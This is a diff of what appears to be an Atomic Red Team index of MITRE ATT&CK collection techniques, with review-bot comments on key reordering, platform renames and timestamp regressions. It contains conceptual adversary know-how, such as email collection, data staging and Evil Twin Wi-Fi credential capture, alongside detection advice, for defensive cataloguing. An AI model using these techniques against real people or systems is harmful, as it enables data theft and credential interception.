x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests: []
T1113:
@@ -39449,7 +39925,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests: []
T1557:
@@ -39543,7 +40018,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -39622,7 +40096,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1602:
@@ -39661,7 +40134,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39676,30 +40149,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39708,13 +40161,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -39728,20 +40185,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -39784,7 +40258,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests: []
T1560.003:
@@ -39809,7 +40282,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39829,22 +40302,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39861,11 +40336,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
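Review bot: dropping `- Office 365` and `- Google Workspace` from T1114's `x_mitre_platforms` in favour of `- Office Suite` removes Google Workspace as a platform for Email Collection, so any per-platform index that listed T1114 under Google Workspace (or Office 365) should lose those rows in this same change, otherwise the index and the YAML disagree. The same `Office 365` to `Office Suite` rename is applied to T1213.002 earlier and to T1119 and T1530 below, so the index regeneration should cover all of them. The version bump '2.5' to '2.6' is appropriate for the platform change plus the description addition in the preceding hunk.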
@@ -39881,37 +40355,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
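Review bot: the `(Citation: TrustedSec OOB Communications)` and `(Citation: CISA AA20-352A 2021)` tags added to the T1114 description two hunks up are resolved by the two `external_references` entries added here, so keep these hunks together if the change is ever split, or the description will cite sources that do not exist. For the T1025 block that starts at the end of this hunk, the removed `x_mitre_platforms`, `x_mitre_contributors`, `id`, `created` and `external_references` keys are all re-added in the following hunk, so that part is a reorder rather than a deletion.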
@@ -39923,75 +40388,93 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests: []
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests: []
T1114.001:
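Review bot: the Prevailion DarkWatchman reference URL is changed from the live prevailion.com page to a web.archive.org snapshot (https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/), which is the right move for a dead link; note that the `description` keeps "Retrieved January 10, 2022", which predates the snapshot, so readers should understand that field as the original retrieval date. Comparing the removed and added keys for T1074.001, the only value changes are `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, the `modified` timestamp, and the dropped `spec_version`; everything else is reordered, which is easy to miss in a 90-line hunk.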
@@ -40018,7 +40501,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -40042,13 +40525,11 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests: []
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -40069,6 +40550,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -40092,8 +40574,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -40118,7 +40602,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests: []
T1115:
@@ -40185,12 +40668,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests: []
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -40224,10 +40706,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
@@ -40238,13 +40722,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -40285,9 +40770,6 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests:
- name: AWS - Scan for Anonymous Access to S3
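Review bot: removing `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` at the bottom of T1530 is safe only because the two preceding hunks re-insert the same keys higher in the block (after `phase_name: collection` and after `x_mitre_is_subtechnique: false`); read on its own, this hunk looks like a field deletion. No data problem, but a reason to keep the three T1530 hunks in one commit rather than cherry-picking.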
@@ -40324,30 +40806,7 @@ collection:
elevation_required: false
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -40358,23 +40817,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
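Review bot: the T1005 `modified` stamp moves backwards in the last two changed lines of this hunk (`- modified: '2023-05-09T14:00:00.188Z'` / `+ modified: '2023-04-12T23:54:39.466Z'`), and the same regression recurs for T1560.002, T1602.002, T1185, T1557.001, T1125 and T1557.002 further down. Nearly every old value ends in the `14:00:00.188Z` stamp, which points to the previous index having been generated from a differently stamped bundle rather than to these objects having been edited; please state in the PR description which ATT&CK bundle the generator now reads and confirm it is the current release, so the reversed dates are understood as a source change and not as stale data.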
@@ -40444,7 +40927,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests: []
T1560.002:
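Review bot: `spec_version: '2.1'` is removed from T1005 here, and from every other object in this patch, with nothing replacing it. `spec_version` is a required property on STIX 2.1 objects, so after this change the technique objects in the index are no longer shaped like STIX 2.1 SDOs (the retained `x_mitre_attack_spec_version` is ATT&CK's own versioning, not the STIX one). If the index is consumed only by Atomic Red Team's own tooling this is harmless, but it should be called out in the PR description, and any consumer or validator that keys on `spec_version` needs a check.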
@@ -40479,7 +40961,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40498,10 +40980,89 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
